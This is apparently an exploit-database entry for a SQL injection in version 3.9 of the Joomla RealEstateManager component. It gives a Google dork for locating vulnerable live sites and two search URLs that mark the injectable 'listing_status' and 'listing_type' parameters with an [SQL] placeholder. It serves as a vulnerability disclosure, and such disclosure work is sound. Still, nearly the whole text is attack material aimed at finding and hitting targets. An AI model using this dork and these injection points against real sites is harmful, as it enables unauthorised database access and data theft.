18 lines
No EOL
1 KiB
Text
18 lines
No EOL
1 KiB
Text
# # # # #
|
|
# Exploit Title: Joomla! Component RealEstateManager v3.9 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_realestatemanager
|
|
# Date: 22.02.2017
|
|
# Vendor Homepage: http://ordasoft.com/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager-basic/
|
|
# Demo: http://ordasvit.com/joomla-real-estate-manager/
|
|
# Version: 3.9
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=[SQL]
|
|
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=[SQL]
|
|
# # # # # |